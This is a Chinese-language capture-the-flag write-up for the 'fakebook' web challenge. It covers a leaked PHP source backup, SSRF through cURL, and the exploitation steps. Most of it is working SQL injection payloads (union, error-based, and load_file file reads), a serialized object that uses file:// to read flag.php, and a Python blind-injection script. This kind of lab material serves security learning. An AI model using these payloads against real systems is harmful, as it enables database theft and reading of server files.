复现环境
考察知识点
- 访问robots.txt可以得到源码的备份地址
- SQL注入
- SSRF
- file协议读取文件
解题分析
首先需要注册一个账户,查看用户信息(存在注入点)
http://7cdbc0bb-2fd9-4ac1-bf1f-00ec6128e081.node3.buuoj.cn/view.php?no=1
通过目录探测可以得知
flag.php
robots.txt
User-agent: *
Disallow: /user.php.bak
访问/user.php.bak发现源码
<?php
class UserInfo
{
/*初始化三个值*/
public $name = "";
public $age = 0;
public $blog = "";
public function __construct($name, $age, $blog)
{
$this->name = $name;
$this->age = (int)$age;
$this->blog = $blog;
}
function get($url)
{
$ch = curl_init();
/*curl_init():初始化一个 cURL 会话并且全部的选项都被设置后被调用*/
curl_setopt($ch, CURLOPT_URL, $url);
/*curl_setopt — 设置 cURL 传输选项*/
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$output = curl_exec($ch);
/*curl_exec — 执行 cURL 会话*/
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
/*curl_getinfo — 获取一个cURL连接资源句柄的信息*/
if($httpCode == 404) {
return 404;
}
curl_close($ch);
return $output;
}
/* 判断blog的值是否可以访问,访问不了就是无效的blog*/
public function getBlogContents ()
{
return $this->get($this->blog);
}
public function isValidBlog ()
{
$blog = $this->blog;
return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
}
}
- cURL是一个利用URL语法在命令行下工作的文件传输工具,cURL还包含了用于程序开发的libcurl。
- PHP支持的由Daniel Stenberg创建的libcurl库允许你与各种的服务器使用各种类型的协议进行连接和通讯。
- libcurl目前支持http、https、ftp、gopher、telnet、dict、file和ldap协议。libcurl同时也支持HTTPS认证、HTTP POST、HTTP PUT、 FTP 上传(这个也能通过PHP的FTP扩展完成)、HTTP 基于表单的上传、代理、cookies和用户名+密码的认证。
- PHP中使用cURL实现Get和Post请求的方法
- 这些函数在PHP 4.0.2中被引入。
·
所以这里的重点是curl_setopt()和curl_exec()这两个函数,在注册界面直接输入file:///var/www/html/flag.php存在过滤,这时候可以利用SSRF来绕过过滤。
解题思路
普通手工注入
通过添加++或者/**/绕过过滤
/view.php?no=1 and 1=1
/view.php?no=1 and 1=2
/view.php?no=1 order by 5
//发现过滤了union select 使用注释绕过
/view.php?no=-1 union/**/select 1,2,3,4
/view.php?no=-1 union/**/select 1,database(),3,4
//得到数据库数据fakebook
/view.php?no=-1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()
//得到表名数据:users
/view.php?no=-1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users'
//得到字段数据:no,username,passwd,data
/view.php?no=-1 union/**/select 1,group_concat(data),3,4 from users
//得到data字段下数据:
O:8:"UserInfo":3:{s:4:"name";s:7:"xiaohua";s:3:"age";i:12;s:4:"blog";s:9:"baidu.com";}
报错注入
1 and extractvalue(1,concat('~',(select(group_concat(database())))))%23
这边需要注意,0x7e已经被过滤掉了,所以我们用‘~’代替,其实0x7e就是指那个符号,这边其实没过滤空格,但是为了省事,万一过滤了空格就很麻烦,所以直接用括号代替了空格,接着查表
1 and extractvalue(1,concat('~',(select(group_concat(table_name))from(information_schema.tables)where(table_schema)='fakebook')))%23
1 and extractvalue(1,concat('~',(select(group_concat(column_name))from(information_schema.columns)where(table_name)='users')))%23
利用left和right函数进行拼接发现是反序列化
1 and extractvalue(1,concat('~',(select(group_concat(right(data,32)))from(fakebook.users))))%23
前面利用no参数进行注入,只能知道数据是以反序列化存储的,
O:8:“UserInfo”:3:{s:4:“name”;s:“123456”;s:3:“age”;i:18;s:4:“blog”;s:5:“5.com”;}
前面在源码中分析到cURL函数存在ssrf漏洞,在反序列化中构造file文件协议,利用服务端请求伪造漏洞访问服务器上的flag.php文件。
解1:
0/**/union/**/select%201,2,3,%27O:8:"UserInfo":3:{s:4:"name";s:1:"1";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}%27%23
-1/**/union/**/select/**/1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:4:"test";s:3:"age";i:123;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'
非预期解决方法
题目没过滤load_file,可以直接从get注入点盲注出来
解2:
/view.php?no=0+unIon/**/select+1,load_file('/var/www/html/flag.php'),1,1
就可以拿到flag了
还有大佬写脚本来解
import requests
url = 'http://6b666407-dc94-41fa-9666-7d5d977b469d.node1.buuoj.cn/view.php?no='
result = ''
for x in range(0, 100):
high = 127
low = 32
mid = (low + high) // 2
while high > low:
payload = "if(ascii(substr((load_file('/var/www/html/flag.php')),%d,1))>%d,1,0)" % (x, mid)
response = requests.get(url + payload)
if 'www.123.com' in response.text:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
result += chr(int(mid))
print(result)
参考链接:
解网鼎杯一道web题(fakebook)
https://blog.csdn.net/SopRomeo/article/details/104493303
https://www.cnblogs.com/chrysanthemum/p/11784487.html
